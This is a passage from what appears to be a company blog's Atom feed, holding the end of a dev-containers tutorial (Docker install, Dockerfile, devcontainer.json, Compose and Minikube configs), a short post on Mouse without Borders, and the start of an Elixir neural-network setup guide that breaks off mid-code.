&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;sudo add-apt-repository &amp;quot;deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;ol start=&quot;5&quot;&gt;
&lt;li&gt;Update the package database with the Docker packages from the newly added repo:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;sudo apt-get update
&lt;/code&gt;&lt;/pre&gt;
&lt;ol start=&quot;6&quot;&gt;
&lt;li&gt;Make sure you are about to install from the Docker repo instead of the default Ubuntu repo:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;apt-cache policy docker-ce
&lt;/code&gt;&lt;/pre&gt;
&lt;ol start=&quot;7&quot;&gt;
&lt;li&gt;Install Docker:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;sudo apt-get install docker-ce
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Remember, Docker commands usually require sudo privileges. To avoid typing sudo every time you run a Docker command, add your username to the Docker group:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;sudo usermod -aG docker ${USER}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;You&#39;ll need to log out and log back in for this to take effect.&lt;/p&gt;
&lt;h3 id=&quot;creating-your-first-docker&quot; tabindex=&quot;-1&quot;&gt;Creating your first Dockerfile&lt;/h3&gt;
&lt;p&gt;Once Docker is up and running, you can create a Dockerfile. This file is a text document that contains all the commands a user could call on the command line to assemble an image.&lt;/p&gt;
&lt;p&gt;Here&#39;s a simple Dockerfile example:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-Dockerfile&quot;&gt;# Use an official Python runtime as a parent image
FROM python:3.7-slim

# Set the working directory in the container to /app
WORKDIR /app

# Copy the current directory contents into the container at /app
COPY . /app

# Install any needed packages specified in requirements.txt
RUN pip install --trusted-host pypi.python.org -r requirements.txt

# Make port 80 available to the world outside this container
EXPOSE 80

# Run app.py when the container launches
CMD [&amp;quot;python&amp;quot;, &amp;quot;app.py&amp;quot;]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In this example, we&#39;re setting up a simple Python application. We specify the parent image we&#39;re using (Python 3.7), set the working directory to /app, add our current directory into the container, install the necessary packages, expose the necessary port, and finally, specify what command to run when the container launches.&lt;/p&gt;
&lt;p&gt;Dockerfiles are incredibly flexible. You can create a Dockerfile for any application, regardless of the technology stack. This flexibility is one of the main benefits of using Dockerfiles to create your dev containers.&lt;/p&gt;
&lt;p&gt;When it comes to best practices for working with dev containers, here are a few tips:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Keep your Dockerfiles lean and efficient. Avoid installing unnecessary packages and clean up after yourself to keep the image size down.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Use .dockerignore files. These work like .gitignore files. They prevent unwanted files from being added to your Docker images.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Build your applications to be environment-agnostic as much as possible. This means minimizing the number of environment-specific configurations you need.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Use environment variables for configuration. This allows you to keep sensitive information out of your Dockerfiles.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Regularly update your images to get the latest security patches. You can automate this process with CI/CD pipelines.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
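&lt;p&gt;As an illustration of the &lt;code&gt;.dockerignore&lt;/code&gt; tip, here is a minimal example for the Python project above. The exact entries are, of course, project-specific:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;.git
.gitignore
__pycache__/
*.pyc
.env
venv/
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Anything matched here is excluded from the build context, which keeps the image small and prevents secrets in files like &lt;code&gt;.env&lt;/code&gt; from being baked into the image.&lt;/p&gt;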
&lt;p&gt;Remember, the goal of using dev containers is to make your development workflow more consistent, isolated, and reproducible. Keep this in mind as you build and work with your dev containers.&lt;/p&gt;
&lt;p&gt;For larger projects, where you might want to combine several development environments, such as C, C++, Erlang, Elixir, JavaScript, and React, the setup can become somewhat involved. This is where Happi Hacking can be of service. We help you set up efficient, custom-made dev environments.&lt;/p&gt;
&lt;p&gt;As we&#39;ll soon see, this concept can be expanded to bring entire execution environments to the developer&#39;s machine using tools like Docker Compose or Minikube.&lt;/p&gt;
&lt;h2 id=&quot;pre-built-dev-containers-a-quick-start&quot; tabindex=&quot;-1&quot;&gt;Pre-built Dev Containers: A Quick Start&lt;/h2&gt;
&lt;p&gt;Pre-built dev containers are a great way to get started quickly. These are ready-made containers available on Docker Hub or other repositories that come with all the necessary tools and configurations already set up. You can simply pull these containers and start using them for development without having to worry about the setup process.&lt;/p&gt;
&lt;p&gt;For instance, if you&#39;re developing a Node.js application, you can pull a Node.js dev container that comes with Node.js, npm, and other necessary tools already installed. This can save you a lot of time and effort.&lt;/p&gt;
&lt;p&gt;Moreover, at Happi Hacking, we offer a custom Docker repository tailored to your organization&#39;s needs. We can provide pre-built dev containers equipped with the tools and configurations that your team uses regularly. This can further streamline your development workflow and ensure consistency across your team.&lt;/p&gt;
&lt;h3 id=&quot;visual-studio-code-dev-containers-seamless-setup-and-integration&quot; tabindex=&quot;-1&quot;&gt;Visual Studio Code Dev Containers: Seamless Setup and Integration&lt;/h3&gt;
&lt;p&gt;Visual Studio Code (VS Code) has a feature called Dev Containers that takes the convenience of pre-built dev containers to the next level. This feature allows you to define your development environment as code using a combination of a Dockerfile and a &lt;code&gt;.devcontainer.json&lt;/code&gt; configuration file.&lt;/p&gt;
&lt;p&gt;Once you&#39;ve defined your dev container, VS Code can automatically build and run the container, and then open your project inside the container environment. This means you can start coding immediately, with all your tools and dependencies already set up and ready to go.&lt;/p&gt;
&lt;p&gt;The real beauty of VS Code Dev Containers is the integration with the VS Code editor. You can use all VS Code features and extensions inside the dev container, just as if you were working locally. This includes IntelliSense code completion, debugging, version control, and more.&lt;/p&gt;
&lt;p&gt;Moreover, VS Code Dev Containers support both single-container and multi-container configurations with Docker Compose. However, it&#39;s important to note that you can only connect to one container per VS Code window. This means you can set up complex development environments involving multiple services, all running in separate but interconnected containers, but you would need to open a separate VS Code window for each container you want to connect to.&lt;/p&gt;
&lt;h4&gt;Customizing Your Environment with .devcontainer.json&lt;/h4&gt;
&lt;p&gt;A &lt;code&gt;devcontainer.json&lt;/code&gt; file is a configuration file that defines the development environment for Visual Studio Code when using Dev Containers. This file is typically located in the root of your project, inside a folder named &lt;code&gt;.devcontainer&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Here&#39;s a basic example of a &lt;code&gt;devcontainer.json&lt;/code&gt; file:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;{
    &amp;quot;name&amp;quot;: &amp;quot;A Happy Project&amp;quot;,
    &amp;quot;image&amp;quot;: &amp;quot;erlang-26.0.2.0&amp;quot;,
    &amp;quot;forwardPorts&amp;quot;: [8080]
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In this example:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;code&gt;&amp;quot;name&amp;quot;&lt;/code&gt;: This is the name of your development environment. It&#39;s displayed in the lower left corner of VS Code when the dev container is active.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;code&gt;&amp;quot;image&amp;quot;&lt;/code&gt;: This is the Docker image that the dev container will use. In this case, it&#39;s using a pre-built image for Erlang.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;code&gt;&amp;quot;forwardPorts&amp;quot;&lt;/code&gt;: This is an array of ports that will be forwarded from the dev container to the host machine. In this case, port 8080 is being forwarded, which is common for web development servers.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These are just some basic options. The &lt;code&gt;devcontainer.json&lt;/code&gt; file can include many other options for more advanced scenarios, such as mounting volumes, setting environment variables, and even using Docker Compose to define multi-container environments.&lt;/p&gt;
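&lt;p&gt;As a sketch of what those options look like, here is a hypothetical extension of the configuration above that sets an environment variable and bind-mounts a local folder; the variable name and mount path are just examples:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;{
    &amp;quot;name&amp;quot;: &amp;quot;A Happy Project&amp;quot;,
    &amp;quot;image&amp;quot;: &amp;quot;erlang-26.0.2.0&amp;quot;,
    &amp;quot;forwardPorts&amp;quot;: [8080],
    &amp;quot;containerEnv&amp;quot;: {
        &amp;quot;MIX_ENV&amp;quot;: &amp;quot;dev&amp;quot;
    },
    &amp;quot;mounts&amp;quot;: [
        &amp;quot;source=${localWorkspaceFolder}/data,target=/data,type=bind&amp;quot;
    ]
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here &lt;code&gt;containerEnv&lt;/code&gt; sets environment variables inside the container, and &lt;code&gt;${localWorkspaceFolder}&lt;/code&gt; expands to the project folder on the host machine.&lt;/p&gt;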
&lt;h2 id=&quot;docker-compose-orchestrating-multi-container-environments&quot; tabindex=&quot;-1&quot;&gt;Docker Compose: Orchestrating Multi-Container Environments&lt;/h2&gt;
&lt;p&gt;Docker Compose is a tool that simplifies the process of managing multi-container Docker applications. It allows you to define and run applications consisting of multiple Docker containers using a single, easy-to-read YAML file. This file, typically named &lt;code&gt;docker-compose.yml&lt;/code&gt;, describes the services that make up your application so they can be run together in a single environment.&lt;/p&gt;
&lt;p&gt;Let&#39;s consider a simple example. Suppose you&#39;re developing a web application that uses a database. Instead of running the web server and database server separately, you can use Docker Compose to run both services together.&lt;/p&gt;
&lt;p&gt;Here&#39;s a basic &lt;code&gt;docker-compose.yml&lt;/code&gt; file for such a scenario:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-yaml&quot;&gt;version: &#39;3&#39;
services:
  web:
    build: .
    ports:
      - &amp;quot;5000:5000&amp;quot;
  db:
    image: postgres
    volumes:
      - ./data:/var/lib/postgresql/data
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In this file, we define two services: &lt;code&gt;web&lt;/code&gt; and &lt;code&gt;db&lt;/code&gt;. The &lt;code&gt;web&lt;/code&gt; service is built using the Dockerfile in the current directory and is mapped to port 5000. The &lt;code&gt;db&lt;/code&gt; service uses the &lt;code&gt;postgres&lt;/code&gt; image and mounts the &lt;code&gt;./data&lt;/code&gt; directory to a specific path within the container.&lt;/p&gt;
&lt;p&gt;To start the application, you would simply run &lt;code&gt;docker-compose up&lt;/code&gt; from the directory containing the &lt;code&gt;docker-compose.yml&lt;/code&gt; file. Docker Compose takes care of starting the services in the correct order, linking them together, and providing them with the necessary environment variables.&lt;/p&gt;
&lt;p&gt;Docker Compose is a powerful tool for managing complex applications with multiple services. It&#39;s especially useful in development environments, where you often need to run multiple services together. By using Docker Compose, you can ensure that your development environment closely matches your production environment, reducing the chances of encountering unexpected issues when you deploy your application.&lt;/p&gt;
&lt;h2 id=&quot;minikube-a-miniature-kubernetes-for-your-local-machine&quot; tabindex=&quot;-1&quot;&gt;Minikube: A Miniature Kubernetes for Your Local Machine&lt;/h2&gt;
&lt;p&gt;Minikube is a tool that lets you run Kubernetes, a powerful platform for managing containerized applications, on your local machine. It&#39;s designed to be easy to use and is perfect for when you&#39;re developing applications that will eventually be deployed on a full-fledged Kubernetes cluster.&lt;/p&gt;
&lt;p&gt;Let&#39;s revisit our web application and database example, but this time, we&#39;ll use Minikube and Kubernetes. The equivalent to a &lt;code&gt;docker-compose.yml&lt;/code&gt; file in Kubernetes is a set of configuration files that define Kubernetes resources such as Pods, Services, and Deployments.&lt;/p&gt;
&lt;p&gt;Here&#39;s a basic Kubernetes Deployment configuration for our web server:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-yaml&quot;&gt;apiVersion: apps/v1
kind: Deployment
metadata:
  name: web
spec:
  replicas: 1
  selector:
    matchLabels:
      app: web
  template:
    metadata:
      labels:
        app: web
    spec:
      containers:
      - name: web
        image: my-web-app:latest
        ports:
        - containerPort: 5000
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And here&#39;s a Service that makes the web server accessible on port 5000:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-yaml&quot;&gt;apiVersion: v1
kind: Service
metadata:
  name: web
spec:
  type: LoadBalancer
  ports:
  - port: 5000
    targetPort: 5000
  selector:
    app: web
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For the database, we could use a similar Deployment and Service configuration, but with the &lt;code&gt;postgres&lt;/code&gt; image and the appropriate ports and volumes.&lt;/p&gt;
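&lt;p&gt;As a rough sketch, such a database Deployment could look like the following. In a real setup you would also configure a PersistentVolumeClaim for the data directory and set the required &lt;code&gt;POSTGRES_PASSWORD&lt;/code&gt; environment variable; both are omitted here for brevity:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-yaml&quot;&gt;apiVersion: apps/v1
kind: Deployment
metadata:
  name: db
spec:
  replicas: 1
  selector:
    matchLabels:
      app: db
  template:
    metadata:
      labels:
        app: db
    spec:
      containers:
      - name: db
        image: postgres
        ports:
        - containerPort: 5432
&lt;/code&gt;&lt;/pre&gt;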
&lt;p&gt;To apply these configurations and start the application, you would use &lt;code&gt;kubectl&lt;/code&gt;, the Kubernetes command-line tool, like so: &lt;code&gt;kubectl apply -f web-deployment.yaml&lt;/code&gt;, &lt;code&gt;kubectl apply -f web-service.yaml&lt;/code&gt;, and so on.&lt;/p&gt;
&lt;p&gt;Minikube brings the power of Kubernetes to your local machine, making it easier to develop complex, multi-container applications. It&#39;s a bit more involved than Docker Compose, but it offers greater flexibility and is a great way to get hands-on experience with Kubernetes.&lt;/p&gt;
&lt;h2 id=&quot;wrapping-up-the-power-of-dev-containers&quot; tabindex=&quot;-1&quot;&gt;Wrapping Up: The Power of Dev Containers&lt;/h2&gt;
&lt;p&gt;We&#39;ve covered a lot of ground in this article, but we&#39;ve only just scratched the surface of what dev containers can do. From providing consistent, reproducible development environments, to simplifying the onboarding process and facilitating collaboration, dev containers offer a host of benefits that can streamline your development workflow.&lt;/p&gt;
&lt;p&gt;To recap, here are some of the key advantages of using dev containers:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Consistency&lt;/strong&gt;: Dev containers ensure that every developer is working in the same environment, eliminating the &amp;quot;but it works on my machine&amp;quot; problem.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Simplicity&lt;/strong&gt;: With dev containers, setting up a new development environment is as easy as running a few commands. No need to install and configure a bunch of software manually.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Isolation&lt;/strong&gt;: Dev containers keep your projects isolated from one another, preventing conflicts between different projects&#39; dependencies.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Versatility&lt;/strong&gt;: Whether you&#39;re using Dockerfiles, Docker Compose, or pre-built images from Docker Hub, dev containers offer a variety of ways to set up your environment.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Integration&lt;/strong&gt;: Tools like Visual Studio Code&#39;s Dev Container feature make it easy to work with dev containers, integrating seamlessly with your existing workflow.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;If you haven&#39;t already, I encourage you to give dev containers a try in your own projects. You might be surprised at how much they can improve your development experience.&lt;/p&gt;
&lt;p&gt;And remember, if you need help setting up your dev container environments, Happi Hacking is here to assist. We offer dev container setup as a service, taking the hassle out of getting your environments up and running. Don&#39;t hesitate to reach out if you&#39;re interested.&lt;/p&gt;
&lt;p&gt;Sometimes confinement can be freedom. Embrace the power of dev containers and see what they can do for you. Happy coding!&lt;/p&gt;
&lt;p&gt;PS.&lt;/p&gt;
&lt;p&gt;Here are some resources for further reading on dev containers:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://code.visualstudio.com/docs/devcontainers/containers&quot;&gt;Developing inside a Container - Visual Studio Code&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://code.visualstudio.com/docs/devcontainers/tips-and-tricks&quot;&gt;Dev Containers Tips and Tricks - Visual Studio Code&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/manekinekko/awesome-devcontainers&quot;&gt;A curated list of awesome tools and resources about dev containers - GitHub&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/devcontainers&quot;&gt;devcontainers - GitHub&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://devspace.sh/docs/configuration/dev/modifications/resources&quot;&gt;Change Resource Constraints For Dev Containers | DevSpace | Documentation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/shows/beginners-series-to-dev-containers/&quot;&gt;Beginner&#39;s Series to: Dev Containers | Microsoft Learn&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://containers.dev/features&quot;&gt;Available Dev Container Features - Development containers&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://containers.dev/implementors/reference/&quot;&gt;Reference Implementation - Development containers&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://developer.ibm.com/technologies/containers/&quot;&gt;Containers - Resources and Tools - IBM Developer&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.docker.com/config/containers/resource_constraints/&quot;&gt;Runtime options with Memory, CPUs, and GPUs | Docker Documentation&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
</content>
  </entry>
  
  <entry>
    <title>Seamless Productivity with Mouse without Borders</title>
    <link href="https://happihacking.com/blog/posts/2023/mouse_without_borders/"/>
    <updated>2023-06-21T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/mouse_without_borders/</id>
    <summary>A Happi Hacker&#39;s Dream</summary>
    <content type="html">&lt;div style=&quot;width: 98%; text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/multimonitor.jpg&quot; alt=&quot;My multi monitor setup.&quot; style=&quot;width: 100%; object-fit: contain;&quot; title=&quot;My multi monitor setup.&quot; /&gt; &lt;/div&gt;
&lt;p&gt;Greetings, fellow productivity enthusiasts! Today, I want to share a remarkable tool that has revolutionized the way I work from home. In a short video that I recorded, I&#39;ll walk you through the magic of Mouse without Borders, a feature-packed gem from Microsoft&#39;s PowerToys suite. Join me on this exciting journey as we explore how this nifty tool enhances my workflow and brings harmony to my dual-laptop setup.&lt;/p&gt;
&lt;p&gt;In the video, you&#39;ll witness the seamless synergy between my trusty Happy Hacking laptop and my dedicated client laptop, gracefully displayed on my wide Samsung monitor. With Picture-in-Picture mode, I relish the joy of having two screens at my fingertips, a visual treat that fuels my productivity.&lt;/p&gt;
&lt;p&gt;The Mouse without Borders enchantment takes center stage. As I move my mouse from my Happy Hacking laptop to my client laptop, the boundaries between the two dissolve. Thanks to this powerful tool, I effortlessly navigate between the realms of both machines. Whether I&#39;m editing code in Emacs running on the Linux subsystem for Windows or swiftly copying and pasting between laptops, the ease of movement is simply unparalleled.&lt;/p&gt;
&lt;p&gt;In this new era of hybrid work, where collaboration with both my company and my esteemed client is the norm, Mouse without Borders becomes my trusted companion. With the synchronization it brings, my two laptops merge into a harmonious workspace. A single mouse is all I need to traverse between my Happy Hacking laptop and my client laptop.&lt;/p&gt;
&lt;p&gt;See for yourself in this video:&lt;/p&gt;
&lt;iframe width=&quot;244&quot; height=&quot;430&quot; src=&quot;https://www.youtube.com/embed/Q5r061ftptI?autoplay=1&amp;mute=1&quot;&gt;
&lt;/iframe&gt;</content>
  </entry>
  
  <entry>
    <title>Neural Networks in Elixir</title>
    <link href="https://happihacking.com/blog/posts/2023/neural_networks_elixir/"/>
    <updated>2023-06-19T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/neural_networks_elixir/</id>
    <summary>A beginner&#39;s guide</summary>
    <content type="html">&lt;div style=&quot;text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/web.jpg&quot; alt=&quot;A spider web.&quot; title=&quot;A spider web.&quot; /&gt; &lt;/div&gt;
&lt;p&gt;Today was an exciting day as I embarked on a journey to explore the world of neural networks using Elixir. My goal is to leverage the power of the BEAM virtual machine and the functional programming paradigm to build a neural network model and, for fun, implement the layers in the network as a network of communicating processes.&lt;/p&gt;
&lt;p&gt;Neural networks are a subset of machine learning algorithms modeled after the human brain. They are designed to recognize patterns and interpret sensory data through a kind of machine perception, labeling or clustering raw input. These algorithms can be used to recognize complex patterns, make predictions, or make decisions in a diverse range of applications including image and speech recognition, medical diagnosis, statistical arbitrage, learning to rank, and even in games. The networks themselves are composed of interconnected nodes or &#39;neurons&#39;, which are organized into layers. Each layer processes the input it receives and passes on a transformed version of the input to the next layer. This structure allows neural networks to learn from data and improve over time, making them a powerful tool in the field of artificial intelligence.&lt;/p&gt;
&lt;p&gt;As it turns out, the great developers in the Elixir community
have already done almost all the work. I have been meaning to
try this out for a long time but have not had the time to do it.
But today I had a Sunday afternoon free and could choose between
playing Diablo IV or doing some coding for fun.&lt;/p&gt;
&lt;p&gt;I hope to revisit this topic in a future blog post, where I plan to enhance Axon&#39;s functionality by using processes and process communication instead of Elixir streams for the loops. I don&#39;t expect it to be more efficient, but I think it would be a fun and cool project to do.&lt;/p&gt;
&lt;p&gt;Today&#39;s blog will be more of a beginner&#39;s guide on how to do a basic setup and how to test that it works.&lt;/p&gt;
&lt;p&gt;I am assuming lots of things, for example that you are running Ubuntu Linux and have some development experience. This is more a guide for me than for you as a reader, sorry ;).&lt;/p&gt;
&lt;h2 id=&quot;setting-up-the-environment&quot; tabindex=&quot;-1&quot;&gt;Setting Up the Environment&lt;/h2&gt;
&lt;p&gt;The first step was to set up the development environment. I used &lt;a href=&quot;https://asdf-vm.com/&quot;&gt;asdf&lt;/a&gt;, a version manager that can manage multiple language runtime versions on a per-project basis.&lt;/p&gt;
&lt;p&gt;Note that these steps are specific to Ubuntu and that I am running Ubuntu in WSL2 under Windows 11, your mileage may vary.&lt;/p&gt;
&lt;p&gt;I cloned the asdf repository and added it to my shell profile:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;git clone https://github.com/asdf-vm/asdf.git ~/.asdf --branch v0.12.0
echo -e &#39;&#92;n. &amp;quot;$HOME/.asdf/asdf.sh&amp;quot;&#39; &amp;gt;&amp;gt; ~/.bashrc
echo -e &#39;&#92;n. &amp;quot;$HOME/.asdf/completions/asdf.bash&amp;quot;&#39; &amp;gt;&amp;gt; ~/.bashrc
. ~/.bashrc
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Next, I added Erlang and Elixir plugins to asdf and installed the versions I needed:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;asdf plugin add erlang
asdf plugin add elixir
asdf install erlang 26.0.1
asdf install elixir main-otp-26
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id=&quot;creating-a-new-elixir-project&quot; tabindex=&quot;-1&quot;&gt;Creating a New Elixir Project&lt;/h2&gt;
&lt;p&gt;With the environment set up, I created a new Elixir project using the &lt;code&gt;mix new&lt;/code&gt; command:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;mix new test_nx
cd test_nx
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id=&quot;adding-dependencies&quot; tabindex=&quot;-1&quot;&gt;Adding Dependencies&lt;/h2&gt;
&lt;p&gt;I added the necessary dependencies to the &lt;code&gt;mix.exs&lt;/code&gt; file. I used &lt;a href=&quot;https://github.com/elixir-nx/nx/tree/main/nx&quot;&gt;Nx&lt;/a&gt;, a multi-dimensional tensor library for Elixir, and &lt;a href=&quot;https://github.com/elixir-nx/nx/tree/main/torchx&quot;&gt;Torchx&lt;/a&gt;, a library that provides bindings for the LibTorch tensor library.&lt;/p&gt;
&lt;p&gt;Nx is the Elixir tensor computation library that allows you to perform numerical computations, which are essential for building neural networks.&lt;/p&gt;
&lt;p&gt;A tensor is a mathematical object that generalizes the concepts of scalars, vectors, and matrices to higher dimensions. It&#39;s essentially an array of numbers, arranged on a grid, with a variable number of axes. Tensors provide a natural and compact way of representing data and transformations of data in machine learning, physics, and many other fields. In the context of machine learning, tensors are particularly important because they efficiently represent and manipulate multi-dimensional data structures, such as images, which can be represented as 3D tensors (height, width, color channels), or text, which can be represented as 2D tensors (sequence length, word embeddings). The ability to work with tensors allows us to handle a wide range of complex data types, making them a fundamental building block in these fields.&lt;/p&gt;
&lt;p&gt;Torchx is an Elixir binding to the popular Torch machine learning library, which I will use in the future to bring some of my old
PyTorch models over to run on the BEAM instead.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-elixir&quot;&gt;defp deps do
  [
    {:nx, &amp;quot;~&amp;gt; 0.5&amp;quot;},
    {:torchx, &amp;quot;~&amp;gt; 0.5&amp;quot;}
  ]
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then, I fetched the dependencies:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;mix deps.get
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id=&quot;exploring-nx&quot; tabindex=&quot;-1&quot;&gt;Exploring Nx&lt;/h2&gt;
&lt;p&gt;I started an IEx session with my Mix dependencies:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;iex -S mix
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I experimented with Nx by creating a tensor and performing some operations on it, copied directly from the &lt;a href=&quot;https://github.com/elixir-nx/nx/tree/main/nx&quot;&gt;Nx documentation&lt;/a&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-elixir&quot;&gt;iex&amp;gt; t = Nx.tensor([[1, 2], [3, 4]])
iex&amp;gt; Nx.divide(Nx.exp(t), Nx.sum(Nx.exp(t)))
#Nx.Tensor&amp;lt;
  f32[2][2]
  [
    [0.032058604061603546, 0.08714432269334793],
    [0.23688282072544098, 0.6439142227172852]
  ]
&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It worked!&lt;/p&gt;
&lt;h2 id=&quot;building-a-neural-network-with-axon&quot; tabindex=&quot;-1&quot;&gt;Building a Neural Network with Axon&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/elixir-nx/axon&quot;&gt;Axon&lt;/a&gt; is a deep learning library for the Elixir programming language. It provides a high-level, flexible API for defining neural network models in Elixir. Axon leverages the Nx library for tensor computations, which allows for efficient numerical computation that is essential in machine learning. The reason for using Axon in this context is its seamless integration with Elixir and the BEAM virtual machine, providing a functional approach to defining and training neural networks. It also supports automatic differentiation and GPU acceleration, which are crucial for training complex models efficiently.&lt;/p&gt;
&lt;p&gt;I added Axon and Exla (and stb_image for a later step, and another blog) to my dependencies:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-elixir&quot;&gt; defp deps do
    [
      {:nx, &amp;quot;~&amp;gt; 0.5&amp;quot;},
      {:torchx, &amp;quot;~&amp;gt; 0.5&amp;quot;},
      {:axon, &amp;quot;~&amp;gt; 0.5&amp;quot;},
      {:exla, &amp;quot;~&amp;gt; 0.5&amp;quot;},
      {:stb_image, &amp;quot;~&amp;gt; 0.5.2&amp;quot;}
    ]
  end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Downloaded the dependencies and started Elixir:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;mix deps.get
iex -S mix
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;To test this I used an example from the &lt;a href=&quot;https://github.com/elixir-nx/axon/blob/main/examples/basics/multi_input_example.exs&quot;&gt;Axon examples&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This model is a simple XOR function that takes two binary inputs and outputs a single binary value. The model is trained using a batch of random binary inputs and their corresponding XOR results.&lt;/p&gt;
&lt;p&gt;The XOR function, a fundamental operation in computing and digital logic, stands for &amp;quot;exclusive or&amp;quot;, and it&#39;s a binary operation that takes two inputs. If exactly one of the inputs is true (or 1 in binary terms), it returns true (or 1). In all other cases (both inputs are false or both are true), it returns false (or 0).&lt;/p&gt;
&lt;p&gt;In the context of this guide, the XOR function is used as a simple problem for the neural network to learn. It&#39;s a non-linear problem, meaning it can&#39;t be solved using simple linear methods, which makes it a good test for a neural network. The goal is to train the network to understand the XOR logic, i.e., given two binary inputs, it should output the correct XOR result. This serves as a basic proof of concept that the neural network is functioning correctly and can learn to approximate functions.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-elixir&quot;&gt;defmodule XOR do

require Axon

  defp build_model(input_shape1, input_shape2) do
    inp1 = Axon.input(&amp;quot;x1&amp;quot;, shape: input_shape1)
    inp2 = Axon.input(&amp;quot;x2&amp;quot;, shape: input_shape2)

    inp1
    |&amp;gt; Axon.concatenate(inp2)
    |&amp;gt; Axon.dense(8, activation: :tanh)
    |&amp;gt; Axon.dense(1, activation: :sigmoid)
  end

  defp batch do
    x1 = Nx.tensor(for _ &amp;lt;- 1..32, do: [Enum.random(0..1)])
    x2 = Nx.tensor(for _ &amp;lt;- 1..32, do: [Enum.random(0..1)])
    y = Nx.logical_xor(x1, x2)
    { %{&amp;quot;x1&amp;quot; =&amp;gt; x1, &amp;quot;x2&amp;quot; =&amp;gt; x2}, y }
  end

  defp train_model(model, data, epochs) do
    model
